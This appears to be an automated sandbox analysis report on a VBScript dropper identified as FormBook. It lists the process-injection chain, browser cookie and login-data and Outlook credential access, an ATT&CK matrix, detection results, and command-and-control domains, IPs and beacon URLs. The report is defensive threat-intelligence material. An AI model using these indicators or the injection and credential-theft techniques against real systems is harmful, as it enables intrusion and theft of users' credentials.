            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: NULL target: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe protection: execute and read and write
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | Section loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: NULL target: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe protection: read write
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: NULL target: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkntfs.exe | Thread register set: target process: 2300
            Source: C:\Windows\SysWOW64\chkntfs.exe | Thread APC queued: target process: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: FB1008
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: JogKDBeJAc.exe, 00000005.00000000.2264864601.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000002.3304205599.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304116255.00000000016A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: JogKDBeJAc.exe, 00000005.00000000.2264864601.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000002.3304205599.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304116255.00000000016A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: JogKDBeJAc.exe, 00000005.00000000.2264864601.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000002.3304205599.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304116255.00000000016A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: JogKDBeJAc.exe, 00000005.00000000.2264864601.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000002.3304205599.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304116255.00000000016A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\chkntfs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix (techniques listed per tactic column; the digits that precede a technique are the count badges the report attaches to it)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 1 Windows Management Instrumentation; 1 Exploitation for Client Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 612 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 612 Process Injection; 1 Abuse Elevation Control Mechanism; 2 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 211 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 123 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Email Collection; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 4 Ingress Tool Transfer; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            Behavior Graph (ID: 1576423). Sample: PO1341489LTB GROUP.vbs. Start date: 17/12/2024. Architecture: WINDOWS. Score: 100.
            Process chain and per-node signatures recovered from the graph:
            Start node: contacts www.waytoocool.life, www.timai.shop and 6 other IPs or domains; signatures: Multi AV Scanner detection for submitted file; Yara detected FormBook; .NET source code contains very large array initializations; 3 other signatures. Starts wscript.exe.
            wscript.exe: drops C:\Users\user\AppData\Local\Temp\x.exe (PE32); signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage). Starts x.exe.
            x.exe: signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures. Starts aspnet_compiler.exe.
            aspnet_compiler.exe: signature: Maps a DLL or memory area into another process. Injects into JogKDBeJAc.exe.
            JogKDBeJAc.exe (injected from aspnet_compiler.exe): signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR). Starts chkntfs.exe.
            chkntfs.exe: signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into JogKDBeJAc.exe; starts firefox.exe.
            JogKDBeJAc.exe (injected from chkntfs.exe): contacts www.brickhills.site (103.224.182.242, ports 49805, 49812, 49818; TRELLIAN-AS-AP Trellian Pty Limited AU, Australia), www.allstary.top (199.193.6.134, ports 49879, 49886, 49892; NAMECHEAP-NET US, United States) and 4 other IPs or domains; signature: Found direct / indirect Syscall (likely to bypass EDR).

            SourceDetectionScannerLabelLink
            PO1341489LTB GROUP.vbs26%VirustotalBrowse
            PO1341489LTB GROUP.vbs21%ReversingLabsScript.Trojan.Heuristic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\x.exe55%ReversingLabsByteCode-MSIL.Backdoor.FormBook
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
https://park.101datacenter.net/images/vendor-1/google_workspace.png | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/images/vendor-1/trustpilot.svg | 0% | Avira URL Cloud | safe | -
http://www.pin-ballerz.net/ocjg/ | 0% | Avira URL Cloud | safe | -
http://www.timai.shop/xsla/?-V8=hoxAaasoZBOD0j1KZ83XYOlI1AJE1doQvwEl/6A98KlFBwCru8LBuQoutmWPazGrcTbrOkYKG6VMwnANAgx3/U5cHXy83Zs53QS9fb9clXtmfZkgH8FbRqFEUKF+mnaT3w==&2H=b6QHb8C0WpQhtV | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour | 0% | Avira URL Cloud | safe | -
http://www.northidahoscans.online/px.js?ch=2 | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=wa | 0% | Avira URL Cloud | safe | -
http://www.northidahoscans.online/px.js?ch=1 | 0% | Avira URL Cloud | safe | -
https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=waytoocool.life&utm | 0% | Avira URL Cloud | safe | -
http://www.pin-ballerz.net/ocjg/?-V8=PsakXBZzgyoVbyp2hjDhUIAPjymto9iGXnTsMAFbSxg7wqJ/GaGLf9R1SWA0D+LwAwOTNpeqtTSBVw9+2LbbbxVu9AMo8WkIslXiFZquUVbpmyTV+kMBZINqQZENrlqOtg==&2H=b6QHb8C0WpQhtV | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/css/vendor-1.css?20241209054434 | 0% | Avira URL Cloud | safe | -
https://cs.deviceatlas-cdn.com/101dacs.js | 0% | Avira URL Cloud | safe | -
http://www.timai.shop | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/images/vendor-1/google-reviews.svg | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/images/vendor-1/icon/101domain.ico | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s | 0% | Avira URL Cloud | safe | -
http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/images/vendor-1/com.png | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/gmail_email_aliases.htm | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s | 0% | Avira URL Cloud | safe | -
http://www.brickhills.site/q6c0/ | 0% | Avira URL Cloud | safe | -
http://www.waytoocool.life/nydx/ | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/js/jquery-3.6.0.min.js?20241209054434 | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra | 0% | Avira URL Cloud | safe | -
http://www.waytoocool.life/nydx/?-V8=q7nzFJj3afdOFJJfiG7XJfkkRIbmdsBL0Xh9x7HOO1bMwAYpIu+EkXrpUMzqVtVwT+pWdZ8+fZkDpnUDi5L0pxX3zg/WB9ChebFWf29eE9HJh+d3M/EMfjpTQLNaei8vxw==&2H=b6QHb8C0WpQhtV | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/js/pricing.js?20241209054434 | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/resource_center.htm | 0% | Avira URL Cloud | safe | -
https://cs.deviceatlas-cdn.com/smartclick | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/external_links.htm | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/css/fonts/LatoRegular.woff2 | 0% | Avira URL Cloud | safe | -
https://cs.deviceatlas-cdn.com | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/css/fonts/LatoRegular.woff2) | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/css/fonts/LatoRegular.woff) | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/domain_concierge_service.htm?query=waytoocool.life&utm_campaign=parked-pag | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/images/vendor-1/park-back.jpg | 0% | Avira URL Cloud | safe | -
http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop | 0% | Avira URL Cloud | safe | -
http://www.northidahoscans.online/sk-logabpstatus.php?a=L2g4bEdyRU15NHN0SHVwVWZwYVdjU3FNL0laQndpc0cz | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/js/modernizr-webp.js?20241209054434 | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/images/vendor-1/park-back.webp | 0% | Avira URL Cloud | safe | -
http://www.timai.shop/xsla/ | 0% | Avira URL Cloud | safe | -
https://park.101datacenter.net/images/vendor-1/101domain-logo.svg | 0% | Avira URL Cloud | safe | -
http://www.allstary.top/83oq/?-V8=uON7WwvftimkH6+9fo1haamOfON2rQIMUfJSLV47BI3eNmd69pzs52jdBx/JPqPeVCXck41+K0Sv6SgSfr5VB9MDDVgyHUBPcljHHq+Df2KeZsyLZPWCaDvb78l21qpsnQ==&2H=b6QHb8C0WpQhtV | 0% | Avira URL Cloud | safe | -
http://www.northidahoscans.online/lvnw/?-V8=PnfuVDu+NOzkAh7O+7Vj27VnnoRWHWCWtKII0z0YG5WqqHdwEfQqR5XVQmQd5mG7F2k9Soh0q42Pqx1rEU++5lE1fyewpKHAvlydGXlffERlJmNtF5QLa6mLyqy4r6QOPw==&2H=b6QHb8C0WpQhtV | 0% | Avira URL Cloud | safe | -
https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_source | 0% | Avira URL Cloud | safe | -
http://www.allstary.top/83oq/ | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.brickhills.site | 103.224.182.242 | true | false | - | unknown
pin-ballerz.net | 199.15.251.162 | true | false | - | unknown
www.northidahoscans.online | 208.91.197.27 | true | false | - | unknown
www.allstary.top | 199.193.6.134 | true | false | - | unknown
www.waytoocool.life | 52.60.87.163 | true | false | - | unknown
just-do-public-0526-cpdhe.jiexi-010.top | 18.166.177.211 | true | false | - | unknown
www.timai.shop | unknown | unknown | false | - | unknown
www.pin-ballerz.net | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.pin-ballerz.net/ocjg/ | false | Avira URL Cloud: safe | unknown
http://www.timai.shop/xsla/?-V8=hoxAaasoZBOD0j1KZ83XYOlI1AJE1doQvwEl/6A98KlFBwCru8LBuQoutmWPazGrcTbrOkYKG6VMwnANAgx3/U5cHXy83Zs53QS9fb9clXtmfZkgH8FbRqFEUKF+mnaT3w==&2H=b6QHb8C0WpQhtV | false | Avira URL Cloud: safe | unknown
http://www.pin-ballerz.net/ocjg/?-V8=PsakXBZzgyoVbyp2hjDhUIAPjymto9iGXnTsMAFbSxg7wqJ/GaGLf9R1SWA0D+LwAwOTNpeqtTSBVw9+2LbbbxVu9AMo8WkIslXiFZquUVbpmyTV+kMBZINqQZENrlqOtg==&2H=b6QHb8C0WpQhtV | false | Avira URL Cloud: safe | unknown
http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV | false | Avira URL Cloud: safe | unknown
http://www.waytoocool.life/nydx/?-V8=q7nzFJj3afdOFJJfiG7XJfkkRIbmdsBL0Xh9x7HOO1bMwAYpIu+EkXrpUMzqVtVwT+pWdZ8+fZkDpnUDi5L0pxX3zg/WB9ChebFWf29eE9HJh+d3M/EMfjpTQLNaei8vxw==&2H=b6QHb8C0WpQhtV | false | Avira URL Cloud: safe | unknown
http://www.waytoocool.life/nydx/ | false | Avira URL Cloud: safe | unknown
http://www.brickhills.site/q6c0/ | false | Avira URL Cloud: safe | unknown
http://www.timai.shop/xsla/ | false | Avira URL Cloud: safe | unknown
http://www.northidahoscans.online/lvnw/?-V8=PnfuVDu+NOzkAh7O+7Vj27VnnoRWHWCWtKII0z0YG5WqqHdwEfQqR5XVQmQd5mG7F2k9Soh0q42Pqx1rEU++5lE1fyewpKHAvlydGXlffERlJmNtF5QLa6mLyqy4r6QOPw==&2H=b6QHb8C0WpQhtV | false | Avira URL Cloud: safe | unknown
http://www.allstary.top/83oq/ | false | Avira URL Cloud: safe | unknown
http://www.allstary.top/83oq/?-V8=uON7WwvftimkH6+9fo1haamOfON2rQIMUfJSLV47BI3eNmd69pzs52jdBx/JPqPeVCXck41+K0Sv6SgSfr5VB9MDDVgyHUBPcljHHq+Df2KeZsyLZPWCaDvb78l21qpsnQ==&2H=b6QHb8C0WpQhtV | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://park.101datacenter.net/images/vendor-1/google_workspace.png | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dts.gnpge.com | firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://park.101datacenter.net/images/vendor-1/trustpilot.svg | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=wa | chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.northidahoscans.online/px.js?ch=1 | chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.northidahoscans.online/px.js?ch=2 | chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
